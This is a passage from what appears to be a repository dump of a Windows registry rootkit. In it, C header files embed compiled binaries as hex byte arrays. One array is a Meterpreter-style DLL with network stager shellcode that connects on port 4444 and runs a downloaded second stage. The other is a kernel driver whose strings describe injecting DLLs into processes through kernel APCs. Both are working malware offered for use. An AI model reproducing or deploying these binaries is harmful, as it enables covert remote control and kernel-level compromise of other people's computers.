3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00,\r\n0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72,\r\n0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65,\r\n0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,\r\n0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,\r\n0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41,\r\n0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65,\r\n0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32,\r\n0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0
x49,0x33,0x32,0x2e,0x64,\r\n0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00,\r\n0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00,\r\n0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,\r\n0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac,\r\n0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72,\r\n0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\r\n0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\r\n0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\r\n0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\r\n0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\r\n0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\r\n0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\r\n0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\r\n0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\r\n0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,\r\n0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,\r\n0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,\r\n0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,\r\n0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5,\r\n0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d,\r\n0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\r\n0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,\r\n0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,\r\n0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30,\r\n0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30,\r\n0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31,\r\n0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31,\r\n0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31,\r\n0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33,\r\n0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33,\r\n0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33,\r\n0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34,\r\n0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34,\r\n0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35,\r\n0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35,\r\n0x60,0x3
5,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\r\n};"
  },
  {
    "path": "src/includes/rootkit_driver_debug.sys.h",
    "content": "// 23680 bytes readed form ..\\rootkit_driver_debug.sys...\r\nunsigned char rootkit_driver[] =\r\n{\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x45,0x95,0x8a,0x93,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,\r\n0x01,0xf4,0xe5,0xc0,0x2b,0xf4,0xe4,0xc0,0x26,0x32,0x9f,0xc0,0x04,0xf4,0xe4,0xc0,\r\n0x26,0x32,0x89,0xc0,0x03,0xf4,0xe4,0xc0,0x08,0x8c,0x60,0xc0,0x07,0xf4,0xe4,0xc0,\r\n0x08,0x8c,0x76,0xc0,0x00,0xf4,0xe4,0xc0,0x08,0x8c,0x75,0xc0,0x00,0xf4,0xe4,0xc0,\r\n0x52,0x69,0x63,0x68,0x01,0xf4,0xe4,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x56,0x00,0x00,\r\n0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x26,0x00,0x00,0x80,0x02,0x00,0x00,\r\n0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x10,0x80,0x00,0x00,0x00,0x80,0x00,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x80,0x5c,0x00,0x00,0x80,0x02,0x00,0x00,0x46,0xc6,0x00,0x00,0x01,0x00,0x00,0x00,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x41,0x00,0x00,0x00,\r\n0xf4,0x54,0x00,0x00,0x3c,0x00,0x0
0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x80,0x59,0x00,0x00,0xd0,0x02,0x00,0x00,0x80,0x03,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x0e,0x00,0x00,0x40,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x02,0x00,0x00,0xb0,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x8c,0x2a,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x02,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x68,\r\n0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xa0,0x00,0x00,0x00,0x80,0x2d,0x00,0x00,\r\n0x00,0x01,0x00,0x00,0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc8,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00,\r\n0xfa,0x2a,0x00,0x00,0x80,0x2e,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x2e,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0xe2,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xd8,0x02,0x00,0x00,0x80,0x59,0x00,0x00,\r\n0x00,0x03,0x00,0x00,0x80,0x59,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00,\r\n0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00,\r\n0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00,\r\n0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00,\r\n0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00,\r\n0xd4,0x57,0x00,0x
00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00,\r\n0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00,\r\n0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00,\r\n0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00,\r\n0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x58,0x03,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5f,\r\n0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x73,0x79,0x73,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x64,0x00,0x00,0x00,0xb0,0x0e,0x00,0x00,0xb0,0x0e,0x00,0x00,0x42,0x00,0x6f,0x00,\r\n0x67,0x00,0x75,0x00,0x73,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x74,0x00,0x6f,0x00,\r\n0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72,\r\n0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,\r\n0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,\r\n0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x4b,0x65,0x72,0x6e,0x65,0x6c,\r\n0x41,0x70,0x63,0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x0a,0x00,0x00,0x00,\r\n0x49,0x6e,0x6a,0x65,0x63,0x74,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x63,0x65,0x73,\r\n0x73,0x28,0x29,0x3a,0x20,0x22,0x25,0x77,0x5a,0x22,0x2c,0x20,0x50,0x49,0x44,0x20,\r\n0x3d,0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,\r\n0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,0x73,0x74,0x61,0x74,\r\n0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x50,0x73,0x4c,0x6f,\r\n0
x6f,0x6b,0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,\r\n0x63,0x65,0x73,0x73,0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,\r\n0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,\r\n0x49,0x6d,0x6a,0x65,0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,\r\n0x65,0x28,0x29,0x3a,0x20,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x20,0x66,0x6f,0x72,0x20,\r\n0x69,0x6d,0x61,0x67,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,\r\n0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6d,0x6a,0x65,\r\n0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,0x65,0x28,0x29,0x20,\r\n0x45,0x58,0x43,0x45,0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x5a,0x77,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,\r\n0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,\r\n0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,\r\n0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,\r\n0x6f,0x6e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,\r\n0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,\r\n0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,0x65,\r\n0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x69,0x73,0x20,0x61,0x74,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x43,0x61,0x6c,0x6c,\r\n0x67,0x61,0x74,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x61,\r\n0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,\r\n0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,\r\n0x20,0x45,0x72,0x72,0x6f,0x72,0x20,0x77,0x68,0x69,0x6c,0x65,0x20,0x64,0x65,0x6c,\r\n0x69,0x76,0x65,0x72,0x69,0x6e,0x67,0x20,0x41,0x50,0x43,0x0a,0x00,0x00
,0x00,0x00,\r\n0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,\r\n0x73,0x28,0x29,0x3a,0x20,0x41,0x50,0x43,0x20,0x64,0x65,0x6c,0x69,0x76,0x65,0x72,\r\n0x65,0x64,0x21,0x0a,0x00,0x00,0x00,0x00,0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,\r\n0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x0a,0x00,0x00,0x00,0x5a,0x77,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,\r\n0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,\r\n0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,\r\n0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x45,0x58,0x43,0x45,\r\n0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x4f,0x62,0x4f,0x70,0x65,0x6e,0x4f,0x62,\r\n0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x28,0x29,0x20,\r\n0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x4e,0x61,0x6d,0x65,0x28,\r\n0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x5